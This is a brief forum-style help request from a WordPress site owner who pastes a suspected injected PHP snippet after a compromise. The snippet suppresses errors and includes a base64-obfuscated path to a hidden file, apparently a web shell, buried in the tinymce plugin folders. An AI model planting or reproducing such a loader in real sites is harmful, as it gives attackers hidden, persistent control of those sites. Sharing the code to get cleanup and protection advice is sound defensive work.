Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?
Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>